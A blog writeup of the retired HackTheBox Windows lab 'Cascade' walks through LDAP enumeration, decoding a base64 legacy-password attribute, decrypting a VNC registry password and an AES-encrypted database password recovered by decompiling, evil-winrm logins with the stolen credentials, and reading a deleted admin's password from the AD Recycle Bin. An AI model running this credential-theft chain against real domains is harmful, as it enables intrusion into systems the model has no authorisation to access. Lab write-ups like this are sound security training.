HTB: Cascade

Posted on 26 Jul 2020 in security • 7 min read

Cascade Card

This is a writeup about a retired HacktheBox machine: Cascade publish on Mars 28 2020 by VbScrub. This box is rated as medium box. It implies some LDAP search, some SMB shares, a VNC registry, some reverse engineering and the AD Recycle Bin.



Let us start as always by a nmap scan. The box is quit busy so first of all we run a simple nmap scan:

# Nmap 7.80 scan initiated Fri Apr 10 05:54:33 2020 as: nmap -p- -sSV -oN nmap
Nmap scan report for
Host is up (0.084s latency).
Not shown: 65520 filtered ports
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-10 09:59:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
# Nmap done at Fri Apr 10 05:57:39 2020 -- 1 IP address (1 host up) scanned in 185.33 seconds

As always with Windows box there is a lot of open ports and services. We try to enumerate a few of them and run enum4linux.


The interesting service is the LDAP. When enumerating and reading the result we discover that the r.thompson account as a filed cascadeLegacyPwd containing some base64 data.

kali@kali:~$ ldapsearch -h -p 389 -x -b "dc=cascade,dc=local"
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 1
codePage: 0
countryCode: 0
badPasswordTime: 132309997863352844
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=

We decode it and found the password rY4n5eva for the r.thompson account.

kali@kali:~$  echo -ne 'clk0bjVldmE=' | base64 -d

SMB share

Using this account we can enumerate the available SMB shares.

kali@kali:~$  smbclient -L \\\\ -U 'r.thompson'
Unable to initialize messaging context
Enter WORKGROUP\r.thompson's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Audit$          Disk
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

We mount the Data share using our account and list its content, the file VNC Install.reg inside s.smith folder seems interesting.

kali@kali:~$  sudo mount // /mnt/ -o username=r.thompson
tree /mnt/
├── Contractors
├── Finance
├── IT
│   ├── Email Archives
│   │   └── Meeting_Notes_June_2018.html
│   ├── LogonAudit
│   ├── Logs
│   │   ├── Ark AD Recycle Bin
│   │   │   └── ArkAdRecycleBin.log
│   │   └── DCs
│   │       └── dcdiag.log
│   └── Temp
│       ├── r.thompson
│       └── s.smith
│           └── VNC Install.reg
├── Production
└── Temps

13 directories, 4 files

This VNC Install.reg file inside s.smith folder is the Windows Registry of a VNC installation. The Password entry is really interesting.

kali@kali:~$ cat /mnt/IT/Temp/s.smith/VNC\ Install.reg
��Windows Registry Editor Version 5.00



A few Google search lead us to github repository explaining how to decrypt the password using the Interactive Ruby Shell from metasploit.

$ msfconsole
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["6BCF2A4B6E5ACA0F"].pack('H*'), fixedkey
=> "sT333ve2"

With this account we can connect to the box using evil-winrm. We quickly found the user flag inside on our user Desktop.

kali@kali:~/tools/github/evil-winrm$ ruby ./evil-winrm.rb -i -u s.smith -p sT333ve2

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\s.smith\Documents> type "C:\Users\s.smith\Desktop\user.txt"

Getting root

We try to mount some other share with our s.smith account. Audit is interesting as there is a executable binary CascAudit.exe, a DLL CascCrypto.dll, and a SQLite Database Audit.db.

kali@kali:~$ sudo mount //$ /mnt/ -o username=s.smith
Password for s.smith@//$:  ********
kali@kali:~$ tree /mnt/
├── CascAudit.exe
├── CascCrypto.dll
├── DB
│   └── Audit.db
├── RunAudit.bat
├── System.Data.SQLite.dll
├── System.Data.SQLite.EF6.dll
├── x64
│   └── SQLite.Interop.dll
└── x86
    └── SQLite.Interop.dll

3 directories, 8 files

We load the executable in DNSpy and look at the code. We saw a function that use the Crypto DLL to decrypt a text providing from the database using the key c4scadek3y654321.

using (SQLiteConnection sqliteConnection = new SQLiteConnection("Data Source=" + MyProject.Application.CommandLineArgs[0] + ";Version=3;"))
  string str = string.Empty;
  string password = string.Empty;
  string str2 = string.Empty;
    using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
      using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
        str = Conversions.ToString(sqliteDataReader["Uname"]);
        str2 = Conversions.ToString(sqliteDataReader["Domain"]);
        string text = Conversions.ToString(sqliteDataReader["Pwd"]);
          password = Crypto.DecryptString(text, "c4scadek3y654321");
        catch (Exception ex)
          Console.WriteLine("Error decrypting password: " + ex.Message);

We repeat the SQL request using sqlite3 and got some base64 data for the user ArkSvc.

kali@kali:~/pown/htb_cascade$ sqlite3 Audit.db
SQLite version 3.31.0 2019-12-29 00:52:41
Enter ".help" for usage hints.

We look at the crypto code in the DLL (still using DNSpy). This is a simple AES using a fix IV and the key passed in parameter by the executable binary.

// Token: 0x06000013 RID: 19 RVA: 0x00002360 File Offset: 0x00000760
public static string DecryptString(string EncryptedString, string Key)
  byte[] array = Convert.FromBase64String(EncryptedString);
  Aes aes = Aes.Create();
  aes.KeySize = 128;
  aes.BlockSize = 128;
  aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
  aes.Mode = CipherMode.CBC;
  aes.Key = Encoding.UTF8.GetBytes(Key);
  string @string;
  using (MemoryStream memoryStream = new MemoryStream(array))
    using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
      byte[] array2 = new byte[checked(array.Length - 1 + 1)];
      cryptoStream.Read(array2, 0, array2.Length);
      @string = Encoding.UTF8.GetString(array2);
  return @string;

Here is the CyberChef recipe to decode the password: w3lc0meFr31nd.

From there we can can connect with the ArkSvc account using evil-winrm and enumerate our permissions.

kali@kali:~/tools/github/evil-winrm$ ruby ./evil-winrm.rb -i -u ArkSvc -p w3lc0meFr31nd

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all


User Name      SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106


Group Name
BUILTIN\Pre-Windows 2000 Compatible Access
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
CASCADE\Data Share
CASCADE\AD Recycle Bin
CASCADE\Remote Management Users
NT AUTHORITY\NTLM Authentication
Mandatory Label\Medium Plus Mandatory Level


Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We are in the group AD Recycle Bin. A few Google research lead us to a Microsoft article about AD recycle bin.

We execute the Powershell command to list the deleted objects and see some cascadeLegacyPwd filed for the user TempAdmin.

*Evil-WinRM* PS C:\Users\arksvc\Desktop>  Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *


CanonicalName                   : cascade.local/Deleted Objects/User
CN                              : User
Created                         : 1/26/2020 2:34:31 AM
createTimeStamp                 : 1/26/2020 2:34:31 AM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/1/1601 12:00:00 AM}
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified                        : 1/26/2020 2:40:52 AM
modifyTimeStamp                 : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN               : User
Name                            : User
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : container
ObjectGUID                      : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective               : 0
showInAdvancedViewOnly          : True
uSNChanged                      : 196700
uSNCreated                      : 196690
whenChanged                     : 1/26/2020 2:40:52 AM
whenCreated                     : 1/26/2020 2:34:31 AM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

We decode the base64 filed and found some password.

kali@kali:~$ echo -ne 'YmFDVDNyMWFOMDBkbGVz' | base64 -d

My first idea was to restore the object but it seems that this is not possible.

*Evil-WinRM* PS C:\Users\arksvc\Documents>  Get-ADObject -Filter 'samaccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject
Insufficient access rights to perform the operation
At line:1 char:81
+ ... ccountname -eq "TempAdmin"' -IncludeDeletedObjects | Restore-ADObject
+                                                          ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (CN=TempAdmin\0A...ascade,DC=local:ADObject) [Restore-ADObject], ADException
    + FullyQualifiedErrorId : 0,Microsoft.ActiveDirectory.Management.Commands.RestoreADObject

Therefore I just tried to connect as administrator hoping for password reuse, it worked and I was able to get the root flag..

kali@kali:~/tools/github/evil-winrm$ ruby ./evil-winrm.rb -i -u administrator -pbaCT3r1aN00dles

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt

Wrapping up

This box was fun as there was a lot of different stuff and everything went smoothly. The only painful part is the dig into the ldapsearch results as the file is quit long (6 363 lines).